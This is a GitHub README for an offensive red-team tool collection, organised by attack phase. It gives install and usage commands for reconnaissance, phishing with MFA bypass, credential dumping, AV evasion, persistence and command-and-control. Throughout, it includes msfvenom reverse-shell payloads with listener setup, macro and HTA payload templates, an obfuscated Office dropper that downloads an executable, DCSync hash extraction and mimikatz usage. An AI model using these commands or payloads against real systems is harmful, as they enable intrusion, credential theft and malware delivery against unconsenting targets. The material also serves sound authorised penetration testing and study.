README-en.md

File metadata and controls

2528 lines (1671 loc) · 88.3 KB

RedTeam-Tools

This GitHub repository contains a collection of 75+ tools and resources that can be useful for red teaming activities.

Some of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context.

Warning

The materials in this repository are for informational and educational purposes only. They are not intended for use in any illegal activities.

Note

Hide Tool List headings with the arrow.

Click 🔙 to get back to the list.

Tool List

Reconnaissance $\textcolor{gray}{\text{14 tools}}$
Resource Development $\textcolor{gray}{\text{5 tools}}$
Initial Access $\textcolor{gray}{\text{6 tools}}$
Execution $\textcolor{gray}{\text{8 tools}}$
Persistence $\textcolor{gray}{\text{3 tools}}$
Privilege Escalation $\textcolor{gray}{\text{8 tools}}$
Defense Evasion $\textcolor{gray}{\text{2 tools}}$
Credential Access $\textcolor{gray}{\text{4 tools}}$
Discovery $\textcolor{gray}{\text{4 tools}}$
Lateral Movement $\textcolor{gray}{\text{8 tools}}$
Collection $\textcolor{gray}{\text{2 tools}}$
    • BloodHound Active directory visualisation
    • Snaffler Active directory credential collector
Command and Control $\textcolor{gray}{\text{6 tools}}$
    • Havoc Command and control framework
    • Covenant Command and control framework (.NET)
    • Merlin Command and control framework (Golang)
    • Metasploit Framework Command and control framework (Ruby)
    • Pupy Command and control framework (Python)
    • Brute Ratel Command and control framework ($$$)
Exfiltration $\textcolor{gray}{\text{5 tools}}$
Impact $\textcolor{gray}{\text{1 tool}}$

Reconnaissance

🔙crt.sh -> httprobe -> EyeWitness

I have put together a bash one-liner that:

  • Passively collects a list of subdomains from certificate associations (crt.sh)
  • Actively requests each subdomain to verify its existence (httprobe)
  • Actively screenshots each subdomain for manual review (EyeWitness)

Usage:

domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web

Note: You must have httprobe, pup and EyeWitness installed and change 'DOMAIN_COM' to the target domain. You can run this one-liner concurrently in several terminal windows if you have multiple target root domains.


A JavaScript bookmarklet for extracting all webpage endpoint links on a page.

Created by @renniepak, this JavaScript code snippet can be used to extract all endpoints (starting with /) from the current webpage DOM including all external script sources embedded on the webpage.

javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();

Usage (Bookmarklet)

Create a bookmarklet...

  • Right click your bookmark bar
  • Click 'Add Page'
  • Paste the above JavaScript in the 'url' box
  • Click 'Save'

...then visit the victim page in the browser and click the bookmarklet.


Usage (Console)

Paste the above JavaScript into the browser console (F12) and press Enter.


Fast vulnerability scanner that uses .yaml templates to search for specific issues.

Install:

go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

Usage:

cat domains.txt | nuclei -t /PATH/nuclei-templates/


certSniff is a Certificate Transparency logs keyword watcher I wrote in Python. It uses the certstream library to watch for certificate creation logs that contain keywords, defined in a file.

You can set this running with several keywords relating to your victim domain; any matching certificate creations will be recorded and may lead to the discovery of domains you were previously unaware of.

Install:

git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt

Usage:

python3 certSniff.py -f example.txt


Nice tool for brute forcing file/folder paths on a victim website.

Install:

sudo apt install gobuster

Usage:

gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20


dnsrecon is a Python tool for enumerating DNS records (MX, SOA, NS, A, AAAA, SPF and TXT) and can provide a number of new associated victim hosts to pivot into from a single domain search.

Install:

sudo apt install dnsrecon

Usage:

dnsrecon -d google.com


Shodan crawls public infrastructure and displays it in a searchable format. Using a company name, domain name or IP address, it is possible to discover potentially vulnerable systems relating to your target via Shodan.


Tool for enumerating subdomains, enumerating DNS, WAF detection, WHOIS, port scan, wayback machine, email harvesting.

Install:

git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt

Usage:

python3 AORT.py -d google.com


A program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. Additionally, it will alert if the domain has a DMARC configuration that sends mail or HTTP requests on failed SPF/DKIM emails.

Domains are spoofable if any of the following conditions are met:

  • Lack of an SPF or DMARC record
  • SPF record never specifies ~all or -all
  • DMARC policy is set to p=none or is nonexistent

Install:

git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt

Usage:

./spoofcheck.py [DOMAIN]


AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for interesting files. It's similar to a subdomain bruteforcer but is made specifically for S3 buckets and also has some extra features that allow you to grep for files, as well as download interesting files.

Install:

git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt

Usage:

usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]

optional arguments:
  -h, --help    show this help message and exit
  -D            Download files. This requires significant diskspace
  -d            If set to 1 or True, create directories for each host w/ results
  -t THREADS    number of threads
  -l HOSTLIST
  -g GREPWORDS  Provide a wordlist to grep for
  -m MAXSIZE    Maximum file size to download.

 python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1

Nice tool for finding information from GitHub with regex, with the ability to search specific GitHub users and/or projects.

Install:

git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester

Usage:

./githarvester.py

TruffleHog is a tool that scans git repositories and looks for high-entropy strings and patterns that may indicate the presence of secrets, such as passwords and API keys. With TruffleHog, you can quickly and easily find sensitive information that may have been accidentally committed and pushed to a repository.

Install (Binaries): Link

Install (Go):

git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install

Usage:

trufflehog https://github.com/trufflesecurity/test_keys


Dismap is an asset discovery and identification tool. It can quickly identify protocols and fingerprint information such as web/tcp/udp, locate asset types, and is suitable for internal and external networks.

Dismap has a complete fingerprint rule base, currently including tcp/udp/tls protocol fingerprints and 4500+ web fingerprint rules, which can identify favicon, body, header, etc.

Install:

Dismap is a binary file for Linux, MacOS, and Windows. Go to Release to download the corresponding version to run:

# Linux or MacOS
chmod +x dismap-0.3-linux-amd64
./dismap-0.3-linux-amd64 -h

# Windows
dismap-0.3-windows-amd64.exe -h

Usage:

# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24

# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json

# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10

# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000


Image used from https://github.com/zhzyker/dismap

A tool for enumerating information from Windows and Samba systems.

It can be used to gather a wide range of information, including:

  • Domain and domain controller information
  • Local user and group information
  • Shares and share permissions
  • Security policies
  • Active Directory information

Install: (Apt)

sudo apt install enum4linux

Install: (Git)

git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux

Usage:

# 'Do everything'
enum4linux.pl -a 192.168.2.55

# Obtain list of usernames (RestrictAnonymous = 0)
enum4linux.pl -U 192.168.2.55

# Obtain list of usernames (using authentication)
enum4linux.pl -u administrator -p password -U 192.168.2.55

# Get a list of groups and their members
enum4linux.pl -G 192.168.2.55

# Verbose scan 
enum4linux.pl -v 192.168.2.55

Full usage information can be found in this blog.


Image used from https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/

Resource Development

Chimera is a PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.

Install:

sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/
sudo chmod +x chimera.sh; ./chimera.sh --help

Usage:

./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p


Msfvenom allows the creation of payloads for various operating systems in a wide range of formats. It also supports obfuscation of payloads for AV bypass.

Set Up Listener

use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST your-ip 
set LPORT listening-port 
run

Msfvenom Commands

PHP:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.9 lport=1234 R

Windows:

msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

Linux:

msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

Java:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

HTA:

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta


🔙WSH

Creating payload:

Set shell = WScript.CreateObject("Wscript.Shell")
' Sub call without parentheses: Run path, windowStyle (0 = hidden), waitOnReturn
shell.Run "C:\Windows\System32\calc.exe " & WScript.ScriptFullName, 0, True

Execute:

wscript payload.vbs
cscript.exe payload.vbs

# If .vbs files are blacklisted: host options use a double slash, so force the engine with //E:
wscript //E:VBScript payload.txt

🔙HTA

Creating payload:

<html>
<body>
<script>
    var c = 'cmd.exe';
    new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

Execute: Run file

🔙VBA

Creating payload:

Sub calc()
	Dim payload As String
	payload = "calc.exe"
	CreateObject("Wscript.Shell").Run payload,0
End Sub

Execute: Rename the Sub to Auto_Open() in a macro-enabled document.

Initial Access

The Bash Bunny is a physical USB attack tool and multi-function payload delivery system. It is designed to be plugged into a computer's USB port and can be programmed to perform a variety of functions, including manipulating and exfiltrating data, installing malware, and bypassing security measures.

hackinglab: Bash Bunny – Guide

Hak5 Documentation

Nice Payload Repo

Product Page


evilginx2 + gophish. Gophish is a powerful, open-source phishing framework that makes it easy to test your organization's exposure to phishing. evilginx2 is a standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication.

Install:

git clone https://github.com/fin3ss3g0d/evilgophish

Usage:

Usage:
./setup <root domain> <subdomain(s)> <root domain bool> <redirect url> <feed bool> <rid replacement> <blacklist bool>
 - root domain                     - the root domain to be used for the campaign
 - subdomains                      - a space separated list of evilginx2 subdomains, can be one if only one
 - root domain bool                - true or false to proxy root domain to evilginx2
 - redirect url                    - URL to redirect unauthorized Apache requests
 - feed bool                       - true or false if you plan to use the live feed
 - rid replacement                 - replace the gophish default "rid" in phishing URLs with this value
 - blacklist bool                  - true or false to use Apache blacklist
Example:
  ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false


This framework is great for creating campaigns for initial access: 'SET has a number of custom attack vectors that allow you to make a believable attack quickly'.

Install:

git clone https://github.com/IO1337/social-engineering-toolkit; cd social-engineering-toolkit; python setup.py install

Usage:

python3 setoolkit


Nice tool for logon brute-force attacks. Can brute-force a number of services including SSH, FTP, TELNET, HTTP etc.

Install:

sudo apt install hydra

Usage:

hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username=^USER^&password=^PASS^:Error"
hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh


SquarePhish is an advanced phishing tool that uses a technique combining OAuth Device code authentication flow and QR codes (See PhishInSuits for more about OAuth Device Code flow for phishing attacks).

Attack Steps:

  • Send malicious QR code to victim
  • Victim scans QR code with mobile device
  • Victim directed to attacker controlled server (Triggering OAuth Device Code authentication flow process)
  • Victim emailed MFA code (Triggering OAuth Device Code flow 15 minute timer)
  • Attacker polls for authentication
  • Victim enters code into legit Microsoft website
  • Attacker saves authentication token

Install:

git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt

Note: Before using either module, update the required information in the settings.config file noted with Required.

Usage (Email Module):

usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

  -e EMAIL, --email EMAIL
                        victim email address to send initial QR code email to

Usage (Server Module):

usage: squish.py server [-h] [-c CONFIG] [--debug]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging


King Phisher is a tool that allows attackers to create and send phishing emails to victims to obtain sensitive information.

It includes features like customizable templates, campaign management, and email sending capabilities, making it a powerful and easy-to-use tool for carrying out phishing attacks. With King Phisher, attackers can target individuals or organizations with targeted and convincing phishing emails, increasing the chances of success in their attacks.

Install (Linux - Client & Server):

wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && \
sudo bash ./install.sh

Usage:

Once King Phisher has been installed, please follow the wiki page to set up SSH, the database config, the SMTP server etc.


Execution

Responder is a tool for poisoning the LLMNR and NBT-NS protocols on a network, to allow for credential capture and arbitrary code execution.

The LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) protocols are used by Windows systems to resolve hostnames to IP addresses on a local network. If a hostname cannot be resolved using these protocols, the system will broadcast a request for the hostname to the local network.

Responder listens for these broadcasts and responds with a fake IP address, tricking the requesting system into sending its credentials to the attacker.

Install:

git clone https://github.com/SpiderLabs/Responder
cd Responder

Usage:

# Running the tool
./Responder.py [options]

# Typical usage
./Responder.py -I eth0 -wrf

Full usage information can be found here.


Image used from https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/

A utility that is part of the Impacket library that can be used to extract password hashes and other secrets from a Windows system.

It does this by interacting with the Security Account Manager (SAM) database on the system and extracting the hashed passwords and other information, such as:

  • Password hashes for local accounts
  • Kerberos tickets and keys
  • LSA Secrets

Install:

python3 -m pip install impacket

Usage:

# Extract NTLM hashes with local files
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

# DCSync attack and dump the NTLM hashes of all domain users.
secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:<PASSWORD>@10.10.10.30


Image used from https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy

Evil-WinRM is a tool that provides a command line interface for Windows Remote Management (WinRM: A service that allows administrators to remotely execute commands on a Windows machine).

Evil-WinRM allows an attacker to remotely connect to a Windows machine using WinRM and execute arbitrary commands.

Some features include:

  • Loading in memory Powershell scripts
  • Loading in memory dll files bypassing some AVs
  • Loading x64 payloads
  • Pass-the-hash support
  • Uploading and downloading local and remote files

Install: (Git)

sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm

Install: (Ruby gem)

gem install evil-winrm

Alternative installation instructions can be found here.

Usage:

# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm  -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

# Upload local files to victim
upload local_filename
upload local_filename destination_filename

# Download remote files to local machine
download remote_filename
download remote_filename destination_filename

# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe

# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll

Full usage documentation can be found here.


Image used from https://korbinian-spielvogel.de/posts/heist-writeup/

A tool for in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. It can be used to load and run custom payloads on target systems without the need to drop files to disk.

Install: (Windows)

git clone http://github.com/thewover/donut.git

To generate the loader template, dynamic library donut.dll, the static library donut.lib and the generator donut.exe. Start an x64 Microsoft Visual Studio Developer Command Prompt, change to the directory where you cloned the Donut repository and enter the following:

nmake -f Makefile.msvc

To do the same, except using MinGW-64 on Windows or Linux, change to the directory where you cloned the Donut repository and enter the following:

make -f Makefile.mingw

Install: (Linux)

pip3 install donut-shellcode

Usage:

import donut

# Creating shellcode from an XSL file that pops up a calculator.
shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\calc.xsl")

# Creating shellcode from an unmanaged DLL. Invokes DLLMain.
shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")

For full usage information, see the donut GitHub Page.

See a recent blog post from The Wover for more info.


A tool used to automatize the obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for red teaming.

Install: (Binary)

  1. Get the latest binary from https://github.com/sevagas/macro_pack/releases/
  2. Download binary on PC with genuine Microsoft Office installed.
  3. Open console, CD to binary dir and call the binary

Install: (Git)

git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt

Usage:

# Help Page
python3 macro_pack.py  --help

# List all supported file formats
macro_pack.exe --listformats

# Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba

# Obfuscate Empire stager VBA file and generate a MS Word document:
macro_pack.exe -f empire.vba -o -G myDoc.docm

# Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)
echo "https://myurl.url/payload.exe" "dropped.exe" |  macro_pack.exe -o -t DROPPER -G "drop.xlsm" 

# Execute calc.exe via Dynamic Data Exchange (DDE) attack
echo calc.exe | macro_pack.exe --dde -G calc.xlsx


A collection of PowerShell scripts and modules that can be used to achieve a variety of red teaming objectives.

Some of the features of PowerSploit:

  • Dump password hashes and extract clear-text passwords from memory
  • Escalate privileges and bypass security controls
  • Execute arbitrary PowerShell code and bypass execution restrictions
  • Perform network reconnaissance and discovery
  • Generate payloads and execute exploits

Install: 1. Save to PowerShell modules folder

First you will need to download the PowerSploit Folder and save it to your PowerShell modules folder.

Your PowerShell modules folder path can be found with the following command:

$Env:PSModulePath

Install: 2. Install PowerSploit as a PowerShell module

You will then need to install the PowerSploit module (use the name of the downloaded folder).

Note: Your PowerShell execution policy might block you; to fix this, run the following command.

powershell.exe -ep bypass

Now you can install the PowerSploit module.

Import-Module PowerSploit

Usage:

Get-Command -Module PowerSploit


A tool that can be used to perform various actions related to Microsoft Active Directory (AD) environments, such as dumping password hashes, creating/deleting users, and modifying user properties.

Some of the features of Rubeus:

  • Kerberoasting
  • Golden ticket attacks
  • Silver ticket attacks

Install: (Download)

You can install the unofficial pre-compiled Rubeus binary here.

Install: (Compile)

Rubeus is compatible with Visual Studio 2019 Community Edition. Open the rubeus project .sln, choose "Release", and build.

Usage:

Rubeus.exe -h


A nice tool for checking a victim's endpoint for vulnerabilities relating to high integrity processes, groups, hijackable paths, etc.

Install: (Download)

You can install the unofficial pre-compiled SharpUp binary here.

Install: (Compile)

SharpUp is compatible with Visual Studio 2015 Community Edition. Open the SharpUp project .sln, choose "Release", and build.

Usage:

SharpUp.exe audit
#-> Runs all vulnerability checks regardless of integrity level or group membership.

SharpUp.exe HijackablePaths
#-> Check only if there are modifiable paths in the user's %PATH% variable.

SharpUp.exe audit HijackablePaths
#-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.


Persistence

Impacket provides a set of low-level Python bindings for various network protocols, including SMB, Kerberos, and LDAP, as well as higher-level libraries for interacting with network services and performing specific tasks such as dumping password hashes and creating network shares.

It also includes a number of command-line tools that can be used to perform various tasks such as dumping SAM databases, enumerating domain trusts, and cracking Windows passwords.

Install:

python3 -m pip install impacket

Install: (With Example Scripts)

Download and extract the package, then navigate to the install folder and run...

python3 -m pip install .

Usage:

# Extract NTLM hashes with local files
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

# Gets a list of the sessions opened at the remote hosts
netview.py domain/user:password -target 192.168.10.2

# Retrieves the MSSQL instances names from the target host.
mssqlinstance.py 192.168.1.2

# This script will gather data about the domain's users and their corresponding email addresses.
GetADUsers.py domain/user:password@IP

Great cheat sheet for Impacket usage.


Empire is a post-exploitation framework that allows you to generate payloads for establishing remote connections with victim systems.

Once a payload has been executed on a victim system, it establishes a connection back to the Empire server, which can then be used to issue commands and control the target system.

Empire also includes a number of built-in modules and scripts that can be used to perform specific tasks, such as dumping password hashes, accessing the Windows registry, and exfiltrating data.

Install:

git clone https://github.com/EmpireProject/Empire
cd Empire
sudo ./setup/install.sh

Usage:

# Start Empire
./empire

# List live agents
list agents

# List live listeners
list listeners

Nice usage cheat sheet by HarmJoy.


A Windows persistence toolkit written in C#.

The project has a wiki.

Install: (Binary)

You can find the most recent release here.

Install: (Compile)

  • Download the project files from the GitHub Repo.
  • Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
  • Go to "NuGet Package Manager" --> "Package Sources"
  • Add a package source with the URL "https://api.nuget.org/v3/index.json"
  • Install the Costura.Fody NuGet package. The older version of Costura.Fody (3.3.3) is needed, so that you do not need Visual Studio 2019.
    • Install-Package Costura.Fody -Version 3.3.3
  • Install the TaskScheduler package
    • Install-Package TaskScheduler -Version 2.8.11
  • You can now build the project yourself!

Usage:

A full list of usage examples can be found here.

#KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add 

#Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add

#Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add

#Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add


Privilege Escalation

LinPEAS is a nice, verbose privilege escalation script for finding local privesc routes on Linux endpoints.

Install + Usage:

curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh


WinPEAS is a nice, verbose privilege escalation tool for finding local privesc routes on Windows endpoints.

Install + Usage:

$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")


Linux Smart Enumeration is another good, less verbose privesc tool for Linux.

Install + Usage:

curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh


Certify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).

Certify is designed to be used in conjunction with other red team tools and techniques, such as Mimikatz and PowerShell, to enable red teamers to perform various types of attacks, including man-in-the-middle attacks, impersonation attacks, and privilege escalation attacks.

Key features of Certify:

  • Certificate creation
  • Certificate signing
  • Certificate import
  • Certificate trust modification

Install: (Compile)

Certify is compatible with Visual Studio 2019 Community Edition. Open the Certify project .sln, choose "Release", and build.

Install: (Running Certify Through PowerShell)

If you want to run Certify in-memory through a PowerShell wrapper, first compile Certify and base64-encode the resulting assembly:

[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt

Certify can then be loaded in a PowerShell script with the following (where "aa..." is replaced with the base64-encoded Certify assembly string):

$CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))

The Main() method and any arguments can then be invoked as follows:

[Certify.Program]::Main("find /vulnerable".Split())

Full compile instructions can be found here.

Usage:

# See if there are any vulnerable templates
Certify.exe find /vulnerable

# Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal
Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin

Full example walkthrough can be found here.


Get-GPPPassword is a PowerShell script, part of the PowerSploit toolkit, designed to retrieve passwords for local accounts that are created and managed using Group Policy Preferences (GPP).

Get-GPPPassword works by searching the SYSVOL folder on the domain controller for any GPP files that contain password information. Once it finds these files, it decrypts the password information and displays it to the user.

Install:

Follow the PowerSploit installation instructions from this tool sheet.

powershell.exe -ep bypass
Import-Module PowerSploit

Usage:

# Get all passwords with additional information
Get-GPPPassword

# Get list of all passwords
Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq


PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.

Supports:

  • MS10-015 : User Mode to Ring (KiTrap0D)
  • MS10-092 : Task Scheduler
  • MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
  • MS13-081 : TrackPopupMenuEx Win32k NULL Page
  • MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
  • MS15-051 : ClientCopyImage Win32k
  • MS15-078 : Font Driver Buffer Overflow
  • MS16-016 : 'mrxdav.sys' WebDAV
  • MS16-032 : Secondary Logon Handle
  • MS16-034 : Windows Kernel-Mode Drivers EoP
  • MS16-135 : Win32k Elevation of Privilege
  • CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc

Install: (PowerShell)

# Git install
git clone https://github.com/rasta-mouse/Sherlock

# Load powershell module
Import-Module -Name C:\INSTALL_LOCATION\Sherlock\Sherlock.ps1

Usage: (PowerShell)

# Run all functions
Find-AllVulns

# Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference)
Find-MS14058

image

Image used from https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/

Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.

Great for identifying missing patches and suggesting exploits for the corresponding known vulnerabilities, which could be used to gain higher privileges on the system.

Install:

Using Visual Studio 2019 Community Edition. Open the Watson project .sln, choose "Release", and build.

Usage:

# Run all checks
Watson.exe

image

Image text used from https://github.com/rasta-mouse/Watson#usage

A C# based tool that automates the process of discovering and exploiting DLL Hijacks in target binaries.

The discovered hijackable paths can be weaponized, during an engagement, to evade EDRs.

Install:

  • Procmon.exe -> https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
  • Custom Confirmatory DLLs:
    • These are DLL files which assist the tool in confirming whether the DLLs have been successfully loaded from the identified hijack path
    • Compiled from the MalDLL project provided above (or use the precompiled binaries if you trust me!)
    • 32Bit dll name should be: maldll32.dll
    • 64Bit dll name should be: maldll64.dll
    • Install NuGet Package: PeNet -> https://www.nuget.org/packages/PeNet/ (Prereq while compiling the ImpulsiveDLLHijack project)

Note: i & ii prerequisites should be placed in the ImpulsiveDLLHijacks.exe's directory itself.

  • Build and Setup Information:

    • ImpulsiveDLLHijack

      • Clone the repository in Visual Studio
      • Once project is loaded in Visual Studio go to "Project" --> "Manage NuGet packages" --> Browse for packages and install "PeNet" -> https://www.nuget.org/packages/PeNet/
      • Build the project!
      • The ImpulsiveDLLHijack.exe will be inside the bin directory.
    • And for Confirmatory DLLs:

      • Clone the repository in Visual Studio
      • Build the project with x86 and x64
      • Rename x86 release as maldll32.dll and x64 release as maldll64.dll
    • Setup: Copy the Confirmatory DLLs (maldll32 & maldll64) into the ImpulsiveDLLHijack.exe directory & then execute ImpulsiveDLLHijack.exe :))

Install instructions from https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites

Usage:

# Help
ImpulsiveDLLHijack.exe -h

# Look for vulnerabilities in an executable 
ImpulsiveDLLHijack.exe -path BINARY_PATH

Usage examples can be found here.

image

Image used from https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples

Defense Evasion

A PowerShell v2.0+ compatible command and script obfuscator. If a victim endpoint is able to execute PowerShell, this tool is great for creating heavily obfuscated scripts.

Install:

git clone https://github.com/danielbohannon/Invoke-Obfuscation.git

Usage:

./Invoke-Obfuscation

image

Veil is a tool for generating Metasploit payloads that bypass common anti-virus solutions.

It can be used to generate obfuscated shellcode; see the official Veil Framework blog for more info.

Install: (Kali)

apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

Install: (Git)

sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent

Usage:

# List all payloads (--list-payloads) for the tool Ordnance (-t Ordnance)
./Veil.py -t Ordnance --list-payloads

# List all encoders (--list-encoders) for the tool Ordnance (-t Ordnance)
./Veil.py -t Ordnance --list-encoders

# Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234
./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234

# List all payloads (--list-payloads) for the tool Evasion (-t Evasion)
./Veil.py -t Evasion --list-payloads

# Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris
./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris

The Veil creators wrote a nice blog post explaining Ordnance and Evasion command line usage in more depth.

image

Credential Access

Great tool for gaining access to hashed and cleartext passwords on a victim's endpoint. Once you have gained privileged access to a system, drop this tool to collect some creds.

Install:

  1. Download the mimikatz_trunk.7z file.
  2. Once downloaded, the mimikatz.exe binary is in the x64 folder.

Usage:

.\mimikatz.exe
privilege::debug

image

Nice tool for extracting locally stored passwords from browsers, databases, games, mail, git, wifi, etc.

Install: (Binary)

You can install the standalone binary from here.

Usage:

# Launch all modes
.\laZagne.exe all

# Launch only a specific module
.\laZagne.exe browsers

